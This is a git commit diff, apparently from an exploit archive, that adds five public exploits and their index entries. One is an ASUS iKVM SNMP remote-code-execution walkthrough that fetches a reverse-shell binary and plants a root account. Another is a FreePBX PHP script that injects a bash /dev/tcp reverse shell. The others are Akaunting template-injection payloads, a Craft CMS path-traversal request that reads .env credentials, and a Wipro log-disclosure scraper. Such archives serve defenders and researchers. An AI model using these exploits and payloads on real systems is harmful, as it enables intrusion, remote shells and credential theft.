DB: 2024-06-02

6 changes to exploits/shellcodes/ghdb ASUS ASMB8 iKVM 1.14.51 - Remote Code Execution (RCE) & SSH Access Akaunting 3.1.8 - Server-Side Template Injection (SSTI) Craft CMS Logs Plugin 3.0.3 - Path Traversal (Authenticated) FreePBX 16 - Remote Code Execution (RCE) (Authenticated) Wipro Holmes Orchestrator 20.4.1 - Log File Disclosure
2024-06-02 00:16:32 +00:00 · 2024-06-02 00:16:32 +00:00 · ea4df5672e
commit ea4df5672e
parent 3ac07794c9
6 changed files with 350 additions and 0 deletions
--- a/exploits/hardware/remote/52033.txt
+++ b/exploits/hardware/remote/52033.txt
@ -0,0 +1,61 @@
+# Exploit Title: ASUS ASMB8 iKVM 1.14.51 - Remote Code Execution (RCE) & SSH Access
+# Date: 2023-02-16
+# Exploit Author: d1g@segfault.net for NetworkSEC [NWSSA-002-2023]
+# Vendor Homepage: https://servers.asus.com/search?q=ASMB8
+# Version/Model: ASMB8 iKVM Firmware <= 1.14.51 (probably others)
+# Tested on: Linux AMI2CFDA1C7570E 2.6.28.10-ami armv5tejl
+# CVE: CVE-2023-26602
+
++++++++++++++++++++
+0x00 DESCRIPTION
++++++++++++++++++++
+During a recent engagement, a remote server management interface has been
+discovered. Furthermore, SNMPv2 was found to be enabled, offering write
+access to the private community, subsequently allowing us to introduce
+SNMP arbitrary extensions to achieve RCE.
+We also found a hardcoded account sysadmin:superuser by cracking the
+shadow file (md5crypt) found on the system and identifed an "anonymous"
+user w/ the same password, however a lock seems to be in place to prevent
+using these credentials via SSH (running defshell as default shell).
+++++++++++++++
+0x01 IMPACT
+++++++++++++++
+By exploiting SNMP arbitrary extension, we are able to run any command on
+the system w/ root privileges, and we are able to introduce our own user
+circumventing the defshell restriction for SSH.
+++++++++++++++++++++++++++++++
+0x02 PROOF OF CONCEPT (PoC)
+++++++++++++++++++++++++++++++
+At first, we have to create required extensions on the system, e.g. via
+snmpset -m +NET-SNMP-EXTEND-MIB -v 2c -c private x.x.x.x 'nsExtendStatus."cmd"' = createAndGo 'nsExtendCommand."cmd"' = /bin/sh 'nsExtendArgs."cmd"' = '-c "[command]"'
+and if everything is set, we can just run that command by
+snmpbulkwalk -c public -v2c x.x.x NET-SNMP-EXTEND-MIB::nsExtendObjects
+which will execute our defined command and show us its output.
+++++++++++++++++++++++++++++++
+0x03 SSH Remote Root Access
+++++++++++++++++++++++++++++++
+The identified RCE can be used to transfer a reverse tcp shell created
+by msfvenom for arm little-endian, e.g.
+msfvenom -p linux/armle/shell_reverse_tcp LHOST=x.x.x.x LPORT=4444 -f elf -o rt.bin
+We can now transfer the binary, adjust permissions and finally run it:
+snmpset -m +NET-SNMP-EXTEND-MIB -v 2c -c private x.x.x.x 'nsExtendStatus."cmd"' = createAndGo 'nsExtendCommand."cmd"' = /bin/sh 'nsExtendArgs."cmd"' = '-c "wget -O /var/tmp/rt.bin http://x.x.x.x/rt.bin"'
+snmpset -m +NET-SNMP-EXTEND-MIB -v 2c -c private x.x.x.x 'nsExtendStatus."cmd"' = createAndGo 'nsExtendCommand."cmd"' = /bin/sh 'nsExtendArgs."cmd"' = '-c "chmod +x /var/tmp/rt.bin"'
+snmpset -m +NET-SNMP-EXTEND-MIB -v 2c -c private x.x.x.x 'nsExtendStatus."cmd"' = createAndGo 'nsExtendCommand."cmd"' = /bin/sh 'nsExtendArgs."cmd"' = '-c "/var/tmp/rt.bin"'
+Again, we have to request execution of the lines in the MIB via:
+snmpbulkwalk -c public -v2c x.x.x.x NET-SNMP-EXTEND-MIB::nsExtendObjects
+We get a reverse connection from the host, and can now act on the local system
+to easily echo our own line into /etc/passwd:
+echo d1g:OmE2EUpLJafIk:0:0:root:/root:/bin/sh >> /etc/passwd
+By setting the standard shell to /bin/sh, we are able to get a SSH root
+shell into the system, effectively circumventing the defshell restriction.
+$ sshpass -p xxxx ssh x.x.x.x -oHostKeyAlgorithms=+ssh-dss -l d1g
+BusyBox v1.13.2 (2017-07-11 18:39:07 CST) built-in shell (ash)
+Enter 'help' for a list of built-in commands.
+# uname -a
+Linux AMI2CFDA1C7570E 2.6.28.10-ami #1 Tue Jul 11 18:49:20 CST 2017 armv5tejl unknown
+# uptime
+15:01:45 up 379 days, 23:33, load average: 2.63, 1.57, 1.25
+# head -n 1 /etc/shadow
+sysadmin:$1$A17c6z5w$5OsdHjBn1pjvN6xXKDckq0:14386:0:99999:7:::
+---
+#EOF
--- a/exploits/php/webapps/52030.txt
+++ b/exploits/php/webapps/52030.txt
@ -0,0 +1,55 @@
+# Exploit Title: Akaunting 3.1.8 - Server-Side Template Injection (SSTI)
+# Exploit Author: tmrswrr
+# Date: 30/05/2024
+# Vendor: https://akaunting.com/forum
+# Software Link: https://akaunting.com/apps/crm
+# Vulnerable Version(s): 3.1.8
+# Tested : https://www.softaculous.com/apps/erp/Akaunting
+
+
+1 ) Login with admin cred and go to : Items > New Item
+    https://127.0.0.1/Akaunting/1/common/items
+2 ) Write SSTI payload : {{7*7}}  Name field , write Sale and Purchase Price random numbers
+3 ) Save it
+4 ) You will be see result :
+    49
+
+
+====================================================================================
+
+1 ) Login with admin cred and go to :Settings > Taxes > New Tax
+    https://127.0.0.1/Akaunting/1/settings/taxes/1/edit
+2 ) Write SSTI payload : {{7*7}}  Name field , write Sale and Purchase Price random numbers
+3 ) Save it
+4 ) You will be see result :
+    49
+    > {{'a'.toUpperCase()}}
+    > A
+    > {{'a'.concat('b')}}
+    > ab
+====================================================================================
+
+
+1 ) Login with admin cred and go to : Banking > Transactions > New Income
+https://127.0.0.1/Akaunting/1/banking/transactions/create?type=income
+2 ) Write SSTI payload : {{7*7}}  Description field
+3 ) Save it
+4 ) You will be see result :
+    49
+    > {{'a'.toUpperCase()}}
+    > A
+    > {{'a'.concat('b')}}
+    > ab
+
+=======================================================================================
+
+1 ) Login with admin cred
+https://127.0.0.1/Akaunting/1/purchases/vendors/1/edit
+2 ) Write SSTI payload : {{7*7}}  Name field
+3 ) Save it
+4 ) You will be see result :
+    49
+    > {{'a'.toUpperCase()}}
+    > A
+    > {{'a'.concat('b')}}
+    > ab
--- a/exploits/php/webapps/52031.php
+++ b/exploits/php/webapps/52031.php
@ -0,0 +1,41 @@
+# Exploit Title: FreePBX 16 -  Remote Code Execution (RCE) (Authenticated)
+# Exploit Author: Cold z3ro
+# Date: 6/1/2024
+# Tested on: 14,15,16
+# Vendor: https://www.freepbx.org/
+
+<?php
+///
+/// FREEPBX [14,15,16] API Module Authenticated RCE
+/// Orginal Difcon || https://www.youtube.com/watch?v=rqFJ0BxwlLI
+/// Cod[3]d by Cold z3ro
+///
+$url = "10.10.10.186"; // remote host
+$backconnectip = "192.168.0.2";
+$port = "4444";
+$PHPSESSID = "any valid session even extension";
+
+	echo "checking $url\n";
+	$url = trim($url);
+	$ch = curl_init();
+	curl_setopt($ch, CURLOPT_URL, 'http://'.$url.'/admin/ajax.php?module=api&command=generatedocs');
+	curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
+	curl_setopt($ch, CURLOPT_CUSTOMREQUEST, 'POST');
+	curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
+	curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
+	curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 2);
+	curl_setopt($ch, CURLOPT_TIMEOUT, 2);
+	curl_setopt($ch, CURLOPT_HTTPHEADER, [
+		'Referer: http://'.$url.'/admin/config.php?display=api',
+		'Content-Type: application/x-www-form-urlencoded',
+	]);
+	curl_setopt($ch, CURLOPT_COOKIE, 'PHPSESSID='.$PHPSESSID);
+	curl_setopt($ch, CURLOPT_POSTFIELDS, 'scopes=rest&host=http://'.$backconnectip.'/$(bash -1 >%26 /dev/tcp/'.$backconnectip.'/4444 0>%261)');
+	curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
+	curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
+
+	echo $response = curl_exec($ch)."\n";
+
+	curl_close($ch);
+
+?>
--- a/exploits/php/webapps/52034.txt
+++ b/exploits/php/webapps/52034.txt
@ -0,0 +1,111 @@
+# Exploit Title: Craft CMS Logs Plugin 3.0.3 - Path Traversal (Authenticated)
+# Date: 2022.01.26
+# Exploit Author: Steffen Rogge
+# Vendor Homepage: https://github.com/ethercreative/logs
+# Software Link: https://plugins.craftcms.com/logs
+# Version: <=3.0.3
+# Tested on: Linux
+# CVE : CVE-2022-23409
+
+product: Ethercreative Logs plugin for Craft CMS
+fixed version: >=3.0.4
+impact: Medium
+found: 2021-07-06
+SEC Consult Vulnerability Lab
+An integrated part of SEC Consult, an Atos company
+Europe | Asia | North America
+https://www.sec-consult.com
+=======================================================================
+Vendor description:
+-------------------
+"A quick and dirty way to access your logs from inside the CP"
+As found on the plugin store page: https://plugins.craftcms.com/logs
+Active Installs 4,093 (as of 2021-07-07)
+Business recommendation:
+------------------------
+The vendor provides a patched version v3.0.4 which should be installed immediately.
+Vulnerability overview/description:
+-----------------------------------
+1) Authenticated Path Traversal (CVE-2022-23409)
+The plugin "Logs" provides a functionality to read log files of the Craft CMS system inside
+the backend of the CMS. As the requested logfile is not properly validated, an attacker is
+able to request arbitrary files from the underlying file system with the permissions of the
+web service user.
+Proof of concept:
+-----------------
+1) Authenticated Path Traversal (CVE-2022-23409)
+As the plugin is installed as an administrator of the system and the function is only accessible
+after being logged in as an admin, an attacker needs to be authenticated as an administrator in
+the backend in order to extract the needed "{MD5}_identity" cookie for the crafted request.
+The vulnerable endpoint is provided by the plugin under the following path:
+https://vulnerablesite.com/index.php/admin/actions/logs/logs/stream
+The vulnerable controller for that endpoint can be found here:
+https://github.com/ethercreative/logs/blob/master/src/Controller.php
+The function "actionStream()" provides an endpoint for the Craft CMS and does not validate input
+values before file content is being read by the function "file_get_contents".
+public function actionStream ()
+{
+$logsDir = \Craft::getAlias('@storage/logs');
+$logFile = \Craft::$app->request->getParam('log');
+$currentLog = \Craft::$app->request->get('log', $logFile);
+$log = file_get_contents($logsDir . '/' . $currentLog);
+exit($log);
+}
+A crafted GET parameter with the name "log" can be used to access files on the underlying filesystem
+with rights as the user executing the web server. In most cases this will be the user "www-data".
+In order to read the file ".env" or ".env.php" which contains the environment configuration and as
+such also the database credentials, the following request can be used:
+GET /admin/actions/logs/logs/stream?log=../../.env HTTP/1.1
+Host: <host>
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0
+Connection: close
+Cookie: 1031b8c41dfff97a311a7ac99863bdc5_identity=<identity_cookie>;
+The response then discloses the file content of the file ".env":
+HTTP/1.1 200 OK
+Date: Thu, 07 Jul 2021 10:08:52 GMT
+Server: nginx
+Content-Type: text/html; charset=UTF-8
+Expires: Thu, 19 Nov 1981 08:52:00 GMT
+Cache-Control: no-store, no-cache, must-revalidate
+Pragma: no-cache
+Set-Cookie: CraftSessionId=2uisculfj8t9q1tnbiukl6ogjf; path=/; secure; HttpOnly
+Content-Length: 1600
+Connection: close
+[...]
+$craftEnvVars = [
+'DB_DRIVER' => 'mysql',
+'DB_SERVER' => '********',
+'DB_USER' => '********',
+'DB_PASSWORD' => '********',
+'DB_DATABASE' => '********',
+'DB_SCHEMA' => 'public',
+'DB_TABLE_PREFIX' => '',
+'DB_PORT' => '********',
+'SECURITY_KEY' => '********',
+[...]
+Vulnerable / tested versions:
+-----------------------------
+The following version has been tested which was the latest version available at the time
+of the test:
+* Version 3.0.3 released on November 25, 2019
+Distributed through the Craft Plugin Store https://plugins.craftcms.com/logs
+Vendor contact timeline:
+------------------------
+2021-07-07: Contacting vendor through dev@ethercreative.co.uk
+2021-07-08: Response from vendor, no encryption available but vendor accepted to be responsible
+for any risks involved with plaintext communication
+2021-07-08: Advisory was sent to vendor unencrypted
+2021-07-09: Vendor released a patch for this vulnerability with version 3.0.4
+(https://github.com/ethercreative/logs/commit/eb225cc78b1123a10ce2784790f232d71c2066c4)
+2021-07-12: Updated Plugin has been tested on an up-to-date CraftCMS installation
+(CraftCMS 3.7.0, PHP 8, MySQL 8, Logs Plugin 3.0.4)
+2022-01-24: Release of security advisory
+Solution:
+---------
+The vendor released a patched version 3.0.4 or higher which can be retrieved from their
+website/github:
+https://plugins.craftcms.com/logs
+https://github.com/ethercreative/logs/commit/eb225cc78b1123a10ce2784790f232d71c2066c4
+Workaround:
+-----------
+Uninstall/Disable the plugin and access the Craft CMS logs via SSH or other services.
--- a/exploits/windows/remote/52032.py
+++ b/exploits/windows/remote/52032.py
@ -0,0 +1,77 @@
+# Exploit Title: Wipro Holmes Orchestrator 20.4.1 - Log File Disclosure
+# Date: 09/08/2021
+# Exploit Author: Rizal Muhammed @ub3rsick
+# Vendor Homepage: https://www.wipro.com/holmes/
+# Version: Wipro Holmes Orchestrator v20.4.1
+# Tested on: Windows
+# CVE : CVE-2021-38283
+
+import requests as rq
+import argparse
+import datetime
+import os
+from calendar import monthrange
+from multiprocessing.dummy import Pool as ThreadPool
+from functools import partial
+
+# Change if running on different port
+port = 8001
+log_list = [
+    "AlertService.txt", "ApprovalService.txt", "AuditService.txt", "CustomerController.txt",
+    "CustomerDomainCredentialService.txt", "CustomerFile.zip", "CustomerService.txt",
+    "DashboardController.txt", "DataParseService.txt", "DomainService.txt", "ExecutionService.txt",
+    "ExternalAPIService.txt", "FilesController.txt", "FormService.txt", "InfrastructureService.txt",
+    "ITSMConfigPrepService.txt", "LicenseService.txt", "LoginService.txt", "MailService.txt",
+    "MasterdataController.txt", "NetworkService.txt", "OrchestrationPreparationService.txt",
+    "ProblemInfrastructureService.txt", "ProcessExecutionService.txt", "ServiceRequestService.txt",
+    "SolutionController.txt", "SolutionLiveService.txt", "SolutionService.txt", "StorageService.txt",
+    "TaskService.txt", "TicketingService.txt", "UserController.txt", "UtilityService.txt"
+]
+
+def check_month(val):
+    ival = int(val)
+    if ival > 0 and ival < 13:
+        return ival
+    else:
+        raise argparse.ArgumentTypeError("%s is not a valid month" % val)
+
+def check_year(val):
+    iyear = int(val)
+    if iyear >= 1960 and iyear <= datetime.date.today().year:
+        return iyear
+    else:
+        raise argparse.ArgumentTypeError("%s is not a valid year" % val)
+
+def do_request(target, date, log_file):
+    log_url = f"http://{target}/log/{date}/{log_file}"
+    log_name = f"{date}_{log_file}"
+    print(f"[*] Requesting Log: /log/{date}/{log_file}")
+    resp = rq.get(log_url)
+    if resp.status_code == 200 and not "Wipro Ltd." in resp.text:
+        print(f"[+] Success: {log_url}")
+        with open(f"logs/{log_name}", 'w') as lf:
+            lf.write(resp.text)
+        print(f"[*] Log File Written to ./logs/{log_name}")
+
+def main():
+    parser = argparse.ArgumentParser(description="Wipro Holmes Orchestrator 20.4.1 Unauthenticated Log File Disclosure",
+                                     epilog="Vulnerability Discovery, PoC Author - Rizal Muhammed @ub3sick")
+    parser.add_argument("-t", "--target-ip", help="IP Address of the target server", required=True)
+    parser.add_argument("-m", "--month", help="Month of the log, (1=JAN, 2=FEB etc.)", required=True, type=check_month)
+    parser.add_argument("-y", "--year", help="Year of the log", required=True, type=check_year)
+    args = parser.parse_args()
+
+    ndays = monthrange(args.year, args.month)[1]
+    date_list = [f"{datetime.date(args.year, args.month, day)}" for day in range(1, ndays + 1)]
+    target = f"{args.target_ip}:{port}"
+
+    # Create folder "logs" to save log files, if it does not exist
+    if not os.path.exists("./logs"):
+        os.makedirs("./logs")
+
+    for log_date in date_list:
+        for log_file in log_list:
+            do_request(target, log_date, log_file)
+
+if __name__ == "__main__":
+    main()
--- a/files_exploits.csv
+++ b/files_exploits.csv
@ -3342,6 +3342,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 42726,exploits/hardware/remote/42726.py,"Astaro Security Gateway 7 - Remote Code Execution",2017-09-13,"Jakub Palaczynski",remote,hardware,,2017-09-15,2017-09-15,0,CVE-2017-6315,,,,,
 36511,exploits/hardware/remote/36511.txt,"Astaro Security Gateway 8.1 - HTML Injection",2012-12-27,"Vulnerability Research Laboratory",remote,hardware,,2012-12-27,2015-03-27,1,,,,,,https://www.securityfocus.com/bid/51301/info
 22898,exploits/hardware/remote/22898.txt,"Asus AAM6330BI/AAM6000EV ADSL Router - Information Disclosure",2003-07-14,cw,remote,hardware,,2003-07-14,2012-11-22,1,,,,,,https://www.securityfocus.com/bid/8183/info
+52033,exploits/hardware/remote/52033.txt,"ASUS ASMB8 iKVM 1.14.51 - Remote Code Execution (RCE) & SSH Access",2024-06-01,ub3rsick,remote,hardware,,2024-06-01,2024-06-01,0,CVE-2023-26602,,,,,
 44524,exploits/hardware/remote/44524.rb,"ASUS infosvr - Authentication Bypass Command Execution (Metasploit)",2018-04-24,Metasploit,remote,hardware,9999,2018-04-24,2018-05-02,1,CVE-2014-9583,"Metasploit Framework (MSF)",,,,https://raw.githubusercontent.com/rapid7/metasploit-framework/37a844bef0e2fc648663d3bd15ee9101a5b4511c/modules/exploits/linux/misc/asus_infosvr_auth_bypass_exec.rb
 31033,exploits/hardware/remote/31033.py,"ASUS RT-N56U - Remote Buffer Overflow (ROP)",2014-01-19,"Jacob Holcomb",remote,hardware,80,2014-01-20,2016-12-04,0,CVE-2013-6343;OSVDB-102267,,,,,
 35688,exploits/hardware/remote/35688.py,"ASUSWRT 3.0.0.4.376_1071 - LAN Backdoor Command Execution",2015-01-04,"Friedrich Postelstorfer",remote,hardware,,2015-01-04,2015-01-08,1,OSVDB-116691;CVE-2014-9583,,,,,
@ -13850,6 +13851,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 3752,exploits/php/webapps/3752.txt,"AjPortal2Php - 'PagePrefix' Remote File Inclusion",2007-04-17,"Alkomandoz Hacker",webapps,php,,2007-04-16,,1,OSVDB-37571;CVE-2007-2142;OSVDB-37570;OSVDB-37569;OSVDB-37568;OSVDB-37567;OSVDB-37566;OSVDB-37565,,,,,
 7086,exploits/php/webapps/7086.txt,"AJSquare Free Polling Script - 'DB' Multiple Vulnerabilities",2008-11-10,G4N0K,webapps,php,,2008-11-09,,1,OSVDB-57333;CVE-2008-7046;CVE-2008-7045;OSVDB-49779;CVE-2008-7044,,,,,
 2315,exploits/php/webapps/2315.txt,"Akarru 0.4.3.34 - 'bm_content' Remote File Inclusion",2006-09-06,ddoshomo,webapps,php,,2006-09-05,,1,OSVDB-28566;CVE-2006-4645,,,,,
+52030,exploits/php/webapps/52030.txt,"Akaunting 3.1.8 - Server-Side Template Injection (SSTI)",2024-06-01,tmrswrr,webapps,php,,2024-06-01,2024-06-01,0,,,,,,
 51870,exploits/php/webapps/51870.txt,"Akaunting < 3.1.3 - RCE",2024-03-10,u32i,webapps,php,,2024-03-10,2024-03-10,0,CVE-2024-22836,,,,,
 21251,exploits/php/webapps/21251.txt,"akcms 4.2.4 - Information Disclosure",2012-09-11,L0n3ly-H34rT,webapps,php,,2012-09-11,2012-09-16,1,OSVDB-85488,,,,http://www.exploit-db.comakcms4.2.4.tar.gz,
 18293,exploits/php/webapps/18293.txt,"Akiva WebBoard 8.x - SQL Injection",2011-12-30,"Alexander Fuchs",webapps,php,,2011-12-30,2011-12-30,1,OSVDB-86023;CVE-2011-5204;CVE-2011-5203;OSVDB-78069,,,,,
@ -16503,6 +16505,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 46054,exploits/php/webapps/46054.txt,"Craft CMS 3.0.25 - Cross-Site Scripting",2018-12-27,"Raif Berkay Dincel",webapps,php,80,2018-12-27,2019-01-02,0,CVE-2018-20418,"Cross-Site Scripting (XSS)",,,http://www.exploit-db.comCraft-3.0.25.rar,
 46496,exploits/php/webapps/46496.txt,"Craft CMS 3.1.12 Pro - Cross-Site Scripting",2019-03-04,"Ismail Tasdelen",webapps,php,80,2019-03-04,2019-03-04,0,CVE-2019-9554,"Cross-Site Scripting (XSS)",,,,
 51918,exploits/php/webapps/51918.py,"Craft CMS 4.4.14 - Unauthenticated Remote Code Execution",2024-03-25,"Olivier Lasne",webapps,php,,2024-03-25,2024-03-25,0,,,,,,
+52034,exploits/php/webapps/52034.txt,"Craft CMS Logs Plugin 3.0.3 - Path Traversal (Authenticated)",2024-06-01,ub3rsick,webapps,php,,2024-06-01,2024-06-01,0,CVE-2022-23409,,,,,
 48492,exploits/php/webapps/48492.py,"CraftCMS 3 vCard Plugin 1.0.0 - Remote Code Execution",2020-05-20,"Wade Guest",webapps,php,,2020-05-20,2020-05-20,0,,,,,,
 1645,exploits/php/webapps/1645.pl,"Crafty Syntax Image Gallery 3.1g - Remote Code Execution",2006-04-04,undefined1_,webapps,php,,2006-04-03,,1,OSVDB-24387;CVE-2006-1668;OSVDB-24386;CVE-2006-1667,,,,,
 6307,exploits/php/webapps/6307.txt,"Crafty Syntax Live Help 2.14.6 - 'department' SQL Injection",2008-08-25,"GulfTech Security",webapps,php,,2008-08-24,2018-01-05,1,OSVDB-47782;CVE-2008-3845;OSVDB-47781;GTSA-00119,,,,,http://gulftech.org/advisories/Crafty%20Syntax%20Live%20Help%20SQL%20Injection/119
@ -18867,6 +18870,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 40296,exploits/php/webapps/40296.txt,"FreePBX 13.0.35 - Remote Command Execution",2016-08-29,0x4148,webapps,php,,2016-08-29,2016-08-29,0,,,,,,
 40312,exploits/php/webapps/40312.txt,"FreePBX 13.0.35 - SQL Injection",2016-08-29,i-Hmx,webapps,php,,2016-08-29,2016-08-29,0,,,,,,
 40345,exploits/php/webapps/40345.txt,"FreePBX 13.0.x < 13.0.154 - Remote Command Execution",2016-09-07,i-Hmx,webapps,php,,2016-09-07,2016-09-08,0,,,,,,
+52031,exploits/php/webapps/52031.php,"FreePBX 16 -  Remote Code Execution (RCE) (Authenticated)",2024-06-01,"Cold z3ro",webapps,php,,2024-06-01,2024-06-01,0,,,,,,
 2665,exploits/php/webapps/2665.txt,"FreePBX 2.1.3 - 'upgrade.php' Remote File Inclusion",2006-10-28,"Mehmet Ince",webapps,php,,2006-10-27,2016-10-22,1,OSVDB-34694;CVE-2006-7107,,,,http://www.exploit-db.comfreepbx-2.1.3.tgz,
 18650,exploits/php/webapps/18650.py,"FreePBX 2.10.0 / Elastix 2.2.0 - Remote Code Execution",2012-03-23,muts,webapps,php,,2012-03-23,2021-07-29,1,OSVDB-80544;CVE-2012-4869,,,http://www.exploit-db.com/screenshots/idlt19000/elastix-root.png,,
 32214,exploits/php/webapps/32214.pl,"FreePBX 2.11.0 - Remote Command Execution",2014-03-12,@0x00string,webapps,php,80,2014-03-12,2018-04-12,1,CVE-2014-1903;OSVDB-103240,,,,,https://github.com/0x00string/oldays/blob/ace197a0a8f3c2b8111ffe55596bf1dca8a3fdd6/CVE-2014-1903.pl
@ -45700,6 +45704,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 3420,exploits/windows/remote/3420.html,"WinZip 10.0.7245 - FileView ActiveX Buffer Overflow (2)",2007-03-06,prdelka,remote,windows,,2007-03-05,,1,OSVDB-30432;CVE-2006-3890,,,,,
 2785,exploits/windows/remote/2785.c,"WinZip 10.0.7245 - FileView ActiveX Remote Buffer Overflow",2006-11-15,prdelka,remote,windows,,2006-11-14,2016-09-14,1,CVE-2006-6884,,,,http://www.exploit-db.comwinzip110.exe,
 16607,exploits/windows/remote/16607.rb,"WinZip FileView - 'WZFILEVIEW.FileViewCtrl.61' ActiveX Buffer Overflow (Metasploit)",2010-04-30,Metasploit,remote,windows,,2010-04-30,2011-03-10,1,CVE-2006-5198;OSVDB-30433,"Metasploit Framework (MSF)",,,,
+52032,exploits/windows/remote/52032.py,"Wipro Holmes Orchestrator 20.4.1 - Log File Disclosure",2024-06-01,ub3rsick,remote,windows,,2024-06-01,2024-06-01,0,CVE-2021-38283,,,,,
 18125,exploits/windows/remote/18125.rb,"Wireshark - console.lua pre-loading (Metasploit)",2011-11-19,Metasploit,remote,windows,,2011-11-19,2011-11-19,1,CVE-2011-3360;OSVDB-75347,"Metasploit Framework (MSF)",,,,http://technet.microsoft.com/en-us/security/advisory/2269637
 11453,exploits/windows/remote/11453.py,"Wireshark 1.2.5 - LWRES getaddrbyname Buffer Overflow",2010-02-15,"Nullthreat & Pure|Hate",remote,windows,,2010-02-14,2010-09-05,1,,,,http://www.exploit-db.com/screenshots/idlt11500/wire-poc.png,http://www.exploit-db.comwireshark-win32-1.2.5.exe,
 17195,exploits/windows/remote/17195.rb,"Wireshark 1.4.4 - 'packet-dect.c' Remote Stack Buffer Overflow (Metasploit) (2)",2011-04-19,Metasploit,remote,windows,,2011-04-21,2011-04-21,1,CVE-2011-1591;OSVDB-71848,"Metasploit Framework (MSF)",,,http://www.exploit-db.comwireshark-win32-1.4.1.exe,